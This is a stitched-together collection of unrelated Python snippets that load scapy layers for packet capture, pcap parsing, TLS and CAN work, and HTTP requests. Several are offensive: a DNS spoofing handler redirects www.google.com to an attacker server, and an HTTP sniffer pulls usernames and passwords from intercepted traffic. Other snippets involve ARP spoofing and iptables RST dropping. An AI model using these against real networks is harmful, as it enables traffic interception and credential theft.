def main(): os.system("sudo iptables -F") # This one drops all (anywhere source and destination) #os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP") # Drop all from source localhost os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP") # Drop all from source 10.0.2.15 that is my IP address (ifconfig) os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP") os.system("sudo iptables -L") # This is required for traffic to localhost conf.L3socket = L3RawSocket load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=b'www.secdev.org', Pragma=b'no-cache' ) a = TCP_client.tcplink(HTTP, "www.secdev.org", 80) answser = a.sr1(req) a.close() with open("www.secdev.org.html", "wb") as file: file.write(answser.load)
def process_packet(packet): scapy.load_layer('http') #print(packet) #converting packets in scapy packets scapy_packet = scapy.IP(packet.get_payload()) #print(scapy_packet.show()) #check if the packet has a layer that contain DNS response if scapy_packet.haslayer(scapy.DNSRR): #Sotored the website domain qname = scapy_packet[scapy.DNSQR].qname #cheack if the website we are going to spoof is in the qname if "www.google.com" in qname.decode(): #print information that we are spoffing print("[+] Spoofing target...") #create an answer to the target. rrname store the website nam and the rdata the ip of our spoof website answer = scapy.DNSRR(rrname=qname, rdata=get_argument().server) #change the packet that will be send to the one that we modified scapy_packet[scapy.DNS].an = answer #change the answer count to 1 scapy_packet[scapy.DNS].ancount = 1 #delete possible packet in the IP layer that could corrupt our answer in the IP layer del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum #delete possible packet in the IP layer that could corrupt our answer in the UDP layer del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum #change the packet to the scapy packet packet.set_payload(bytes(scapy_packet)) #send the packet to the target packet.accept()
def capture_pcap(q: Queue): import pcap import scapy from scapy.layers.l2 import Ether from scapy.all import load_layer load_layer('inet') s = pcap.pcap('eno1', promisc=True, immediate=True) s.setfilter('udp portrange 16900-17100') def raw_to_dict(data): ue = Ether(data) ip = ue.payload if ip.version != 4: return if ip.proto != 17: return udp = ip.payload if udp.len == 0: return if not isinstance(udp.payload, scapy.packet.Raw): return payload = udp.load return { 'incoming': ip.dst.startswith('192.168.'), 'data': payload, 'src_port': udp.sport, 'dst_port': udp.dport, } for t, data in s: dct = raw_to_dict(data) if data: q.put_nowait(dct)
def main(): sc.load_layer("http") # The whole process should be run as root. try: is_admin = os.getuid() == 0 except AttributeError: is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if not is_admin: sys.stderr.write('Please run as root.\n') sys.exit(1) utils.log('[Main] Terminating existing processes.') if not kill_existing_inspector(): utils.log('[Main] Unable to end existing process. Exiting.') return utils.log('[Main] Starting webserver.') webserver.start_thread() utils.log('[Main] Starting inspector.') inspector.enable_ip_forwarding() utils.safe_run(inspector.start, args=(webserver.context,)) while not webserver.context['quit']: host_state = webserver.context['host_state'] if host_state: with host_state.lock: if host_state.quit: break try: time.sleep(2) except KeyboardInterrupt: print('') break utils.log('[Main] Restoring ARP...') host_state = webserver.context['host_state'] if host_state: with host_state.lock: host_state.spoof_arp = False for t in range(10): print('Cleaning up ({})...'.format(10 - t)) time.sleep(1) inspector.disable_ip_forwarding() utils.log('[Main] Quit.') print('\n' * 100) print(""" Princeton IoT Inspector has terminated. Feel free to close this window. """)
def main(): parser = argparse.ArgumentParser() input_group = parser.add_mutually_exclusive_group(required=True) input_group.add_argument('-n', '--online', '--interface', action='store', dest='input_interface', help='capture online data from INPUT_INTERFACE') input_group.add_argument('-f', '--offline', '--file', action='store', dest='input_file', help='capture offline data from INPUT_FILE') output_group = parser.add_mutually_exclusive_group(required=True) output_group.add_argument('-c', '--csv', '--flow', action='store_const', const='flow', dest='output_mode', help='output flows as csv') output_group.add_argument('-s', '--json', '--sequence', action='store_const', const='sequence', dest='output_mode', help='output flow segments as json') parser.add_argument( 'output', help='output file name (in flow mode) or directory (in sequence mode)') args = parser.parse_args() load_layer('tls') sniffer = create_sniffer(args.input_file, args.input_interface, args.output_mode, args.output) sniffer.start() try: sniffer.join() except KeyboardInterrupt: sniffer.stop() finally: sniffer.join()
def process_sniffed_packet(packet): #we load the layer http scapy.load_layer('http') #check if there is any http request in the ouput if packet.haslayer(HTTPRequest): #variable that store the url of the website url = get_url(packet) #print the url in the terminal print("[+] HTTP Request >> " + url.decode()) #variable that store username and password of a user login_info = get_login_info(packet) #we check if there is any information in the variable if login_info: #print the message print("\n\n[+] Possible username/password > " + login_info.decode() + "\n\n")
def load_scapy(isotp=True, uds=False): ''' Initializes scapy for the use within the custom ansible module. Loads needed scapy modules and makes them directly available in the global namespace. ''' global ISOTPSOCKET_IS_NATIVE if not __INIT: raise RuntimeError("init() was not called") if (WINDOWS): debug( "Platform is Windows -> CANSocket is python-can, ISOTPSocket is ISOTPSoftSocket" ) conf.contribs['CANSocket'] = {'use-python-can': True} conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} elif (LINUX): debug("Platform is Linux -> CANSocket is native") conf.contribs['CANSocket'] = {'use-python-can': False} if (__linux_kernel_module_loaded('can_isotp')): debug("using can_isotp kernel module") conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True} ISOTPSOCKET_IS_NATIVE = True else: debug("can_isotp kernel module not loaded") conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} ISOTPSOCKET_IS_NATIVE = False load_contrib("cansocket") load_layer("can") if (isotp): load_contrib("isotp") if (uds): load_contrib("automotive.uds") _load("scapy.utils")
def get(self): """ :param bad_filename: 数据包存储位置,需要是csv格式 :param bad_pcap_filename: pcap包读取位置 :param num: 读取数据包的数量 :return: None """ PD = PcapDecode() scapy.load_layer('tls') with open(self.bad_filename, 'a') as f: with scapy.PcapReader(self.bad_pcap_filename) as packets: for i, pkt in enumerate(packets): data = PD.ether_decode(pkt) [ f.write("{},".format(value)) for key, value in data.items() ] # [f.write("{}:{}, ".format(key, value)) for key, value in data.items()] f.write("bad\n") # if (i % 200 == 0): # print("目前已处理{0}个数据包.".format(i)) if i == self.num: print("已经处理{}个恶意文件数据包".format(i)) return True
import psycopg2.pool import re from scapy.all import AsyncSniffer, load_layer from scapy.layers.l2 import Ether from scapy.layers.tls.extensions import ServerName from urllib.parse import urlparse # Config threshold = 15 database_url = '' # Globals load_layer('tls') captured_packets = list() filter_ = 'tcp dst port 443 and (tcp[((tcp[12] & 0xf0) >> 2)] = 0x16 && (tcp[((tcp[12] & 0xf0) >> 2)+5] = 0x01))' parsed_url = urlparse(database_url) username = parsed_url.username password = parsed_url.password database = parsed_url.path[1:] hostname = parsed_url.hostname pool = psycopg2.pool.ThreadedConnectionPool(0, 100, user=username, password=password, host=hostname, database=database) # Classes class Handshake(object):
def main(): sc.load_layer("http") # The whole process should be run as root. try: is_admin = os.getuid() == 0 except AttributeError: is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if not is_admin: sys.stderr.write('Please run as root.\n') sys.exit(1) # Check for Windows if utils.get_os() == 'windows': # Check Npcap installation npcap_path = os.path.join(os.environ['WINDIR'], 'System32', 'Npcap') if not os.path.exists(npcap_path): sys.stderr.write( "IoT Inspector cannot run without installing Npcap.\n") sys.stderr.write("For details, visit " + server_config.NPCAP_ERROR_URL) utils.open_browser_on_windows(server_config.NPCAP_ERROR_URL) sys.exit(1) # Check presence of multiple interfaces (e.g., VPN) if len(utils.get_network_ip_range()) == 0: sys.stderr.write( "IoT Inspector cannot run with multiple network interfaces running.\n" ) sys.stderr.write("For details, visit " + server_config.NETMASK_ERROR_URL) utils.open_browser_on_windows(server_config.NETMASK_ERROR_URL) sys.exit(1) utils.log('[Main] Terminating existing processes.') if not kill_existing_inspector(): utils.log('[Main] Unable to end existing process. Exiting.') return utils.log('[Main] Starting inspector.') inspector.enable_ip_forwarding() # We don't wrap the function below in safe_run because, well, if it crashes, # it crashes. host_state = inspector.start() # Waiting for termination while True: with host_state.lock: if host_state.quit: break try: time.sleep(2) except KeyboardInterrupt: print('') break utils.log('[Main] Restoring ARP...') with host_state.lock: host_state.spoof_arp = False for t in range(10): print('Cleaning up ({})...'.format(10 - t)) time.sleep(1) inspector.disable_ip_forwarding() utils.log('[Main] Quit.') print('\n' * 100) print(""" Princeton IoT Inspector has terminated. Feel free to close this window. """) # Remove PID file try: os.remove(get_pid_file()) except Exception: pass
def __init__(self, pcap_file_name, pcap_parser_engine="scapy"): """ Init function imports libraries based on the parser engine selected Return: * packetDB ==> Full Duplex Packet Streams - Used while finally plotting streams as graph - dump packets during report generation * lan_hosts ==> Private IP (LAN) list - device details * destination_hosts ==> Destination Hosts - communication details - tor identification - malicious identification """ # Initialize Data Structures memory.packet_db = {} memory.lan_hosts = {} memory.destination_hosts = {} memory.possible_mal_traffic = [] memory.possible_tor_traffic = [] # Set Pcap Engine self.engine = pcap_parser_engine # Import library for pcap parser engine selected if pcap_parser_engine == "scapy": try: from scapy.all import rdpcap except: logging.error("Cannot import selected pcap engine: Scapy!") sys.exit() try: from scapy.all import load_layer global tls_view_feature tls_view_feature = True logging.info("tls view feature enabled") except: logging.info("tls view feature not enabled") if tls_view_feature: load_layer("tls") # Supress scapy warnings and prefer errors only logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Scapy sessions and other types use more O(N) iterations so just # - use rdpcap + our own iteration (create full duplex streams) self.packets = rdpcap(pcap_file_name) elif pcap_parser_engine == "pyshark": try: import pyshark except: logging.error("Cannot import selected pcap engine: PyShark!") sys.exit() self.packets = pyshark.FileCapture(pcap_file_name, include_raw=True, use_json=True) #self.packets.load_packets() #self.packets.apply_on_packets(self.analyse_packet_data, timeout=100) # Analyse capture to populate data self.analyse_packet_data()
"TLSv1.2": "#bfbdff", "TLSv1.3": "#a14545", "POP3": "#c1a4ba", "DNS": "#00ffff", "DNSv6": "#00ffff", "SSH": "#4c98b3", "SSHv6": "#4c98b3", "SSDP": "#ffe3e5", "SSDPv6": "#ffe3e5", "ICMP": "#fce0ff", "ICMPv6": "#fce0ff", "NTP": "#daeeff", "NTPv6": "#daeeff" } load_layer("tls") load_layer("http") class Core(): # 包编号 packet_id = 1 # 开始标志 start_flag = False # 暂停标志 pause_flag = False # 停止标志 stop_flag = False # 保存标志 save_flag = False # 开始时间戳
# Copyright (C) Nils Weiss <*****@*****.**> # This program is published under a GPLv2 license # """ Default imports required for setup of CAN interfaces """ import os import subprocess import sys from platform import python_implementation from scapy.all import load_layer, load_contrib, conf, log_runtime import scapy.modules.six as six from scapy.consts import LINUX load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False # ############################################################################ # """ Define interface names for automotive tests """ # ############################################################################ iface0 = "vcan0" iface1 = "vcan1" try: _root = os.geteuid() == 0 except AttributeError: _root = False _not_pypy = "pypy" not in python_implementation().lower() _socket_can_support = False
from scapy.all import load_contrib, load_layer from scapy.layers.can import CAN from scapy.contrib.isotp import ISOTPHeader, ISOTP_FF, ISOTPHeaderEA from scapy.contrib.cansocket import CANSocket import argparse from termcolor import colored from scanners import isotpscan load_layer("can") load_contrib("isotp") load_contrib("cansocket") # Save background noises def get_background_noise_callback(noise_packet): global noise_IDs noise_IDs.append(noise_packet.identifier) def get_isotp_packet(type=None): if type == "extended": pkt = ISOTPHeaderEA() / ISOTP_FF() pkt.extended_address = 0 pkt.data = b'\x00\x00\x00\x00\x00' else: pkt = ISOTPHeader() / ISOTP_FF() pkt.data = b'\x00\x00\x00\x00\x00\x00' pkt.identifier = 0x0 pkt.message_size = 100 return pkt
self.sniffer.stop() def remove_old_packets(self): """ remove all already read packets by `get_packets` !! Warning - you will loose the references to those packets !! """ logger.debug("removing old packets with index at {}".format( self.last_index)) del self.store[:self.last_index] def started(self) -> bool: return True if self.sniffer else False def packet_q(self) -> int: """ how many packets is currently in store, not processed """ return len(self.store) - self.last_index if __name__ == '__main__': load_layer('http') p = PacketReader('en0') p.sniff() while True: pck = p.get_packets() for pac in pck: if pac.haslayer(http.HTTP): print(pac.show())
def __init__(self, receiver): self.receiver = receiver self.fragments = {} load_layer('inet')
#!/usr/bin/env python3 import scapy.all as scapy from scapy.layers import http import re, json, random, os, sys import scapy.packet as packet scapy.load_layer("http") #Global variables here PCAP_FILE = os.getcwd() + "/test.pcapng" def dump_to_json(parsed_dict, part_name): out_file = PCAP_FILE.split("/") out_file = out_file[-1] out_file = out_file + '_' + part_name + ".json" with open(out_file, 'w') as f: f.write(json.dumps(parsed_dict, indent=2)) def create_host_dir(dr, rand_num): if os.path.exists(dr): dr = f"{dr}_{rand_num}" os.mkdir(dr) else: os.mkdir(dr) return dr
#print(dir(scapy)) #import random import scapy.all as scapy import scapy.layers as layers scapy.load_layer( "http") # does not complain even if we supply an incorrect name #print(dir(layers)) #host = '8.8.8.8' #host = 'https://httpbin.org/get' host = '54.164.234.192' ip = scapy.IP(dst=host) print(dir(layers.http)) #scapy.explore(layers.http) http = layers.http.HTTP() #http.show() request = layers.http.HTTPRequest(Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=host, Pragma=b'no-cache') #request.show() req = http / request a = scapy.TCP_client.tcplink(layers.http.HTTP, host, 80) # needs root? #answser = a.sr1(ip/req) scapy.send(ip / req)
def __init__(self): load_layer('tls') self.packets = collections.deque(maxlen=1000)
import signal import sys def signal_handler(sig, frame): final_print() sys.exit(0) signal.signal(signal.SIGINT, signal_handler) SCRIPT_DIR = Path(os.path.dirname(os.path.abspath(__file__))) PCAPS_DIR = Path(f'{SCRIPT_DIR}/pcaps') #default directory try: load_layer("http") except: print("*Error: could not load 'http' layer from scapy library") sys.exit(0) headers_counts = Counter() num_of_http_pkts = 0 # https://en.wikipedia.org/wiki/List_of_HTTP_header_fields KNOWN_HEADERS = [ "Cache-Control", "Connection", "Permanent", "Content-Length", "Content-MD5", "Content-Type", "Date", "Keep-Alive", "Pragma", "Upgrade", "Via", "Warning", "X-Request-ID", "X-Correlation-ID", "A-IM", "Accept", "Accept-Charset", "Accept-Encoding", "Accept-Language", "Accept-Datetime", "Access-Control-Request-Method", "Access-Control-Request-Headers",
print(f'[*] BPF: {put_color(bpf, "white")}') print(f'[*] output filename: {put_color(output_filename, "white")}') print( f'[*] output as json: {put_color(need_json, "green" if need_json else "white", bold=False)}' ) print( f'[*] save raw pcap: {put_color(savepcap, "green" if savepcap else "white", bold=False)}' ) if savepcap: print(f'[*] saved in: {put_color(pcap_filename, "white")}.pcap') print() load_layer("tls") start_ts = time.time() try: sniff(**sniff_args) except Exception as e: print(f'[!] {put_color(f"Something went wrong: {e}", "red")}') # raise end_ts = time.time() print('\r[+]', f'all packets: {put_color(COUNT, "cyan")};', f'client hello: {put_color(COUNT_CLIENT, "cyan")};', f'server hello: {put_color(COUNT_SERVER, "cyan")};', f'in {put_color(timer_unit(end_ts-start_ts), "white")}')
from scapy.all import load_layer from scapy.all import sr1,IP,ICMP,TCPSession,sr,srp,srp1,send,sendp,sendpfast,RandShort from scapy.layers.inet import TCP_client,TCP,Ether,UDP ans,unans = sr(IP(dst="8.8.8.8")/TCP(dport=[80,443],flags="S"),timeout=1) p=sr1(IP(dst='8.8.8.8')/ICMP()) if p: p.show() dir(scapy.layers.http) HTTPRequest().show() HTTPResponse().show() load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=b'www.secdev.org', Pragma=b'no-cache' ) a = TCP_client.tcplink(HTTP, "secdev.org", 80) answser = a.sr1(req,timeout=3) a.close() with open("www.secdev.org.html", "wb") as file: file.write(answser.load) load_layer("http")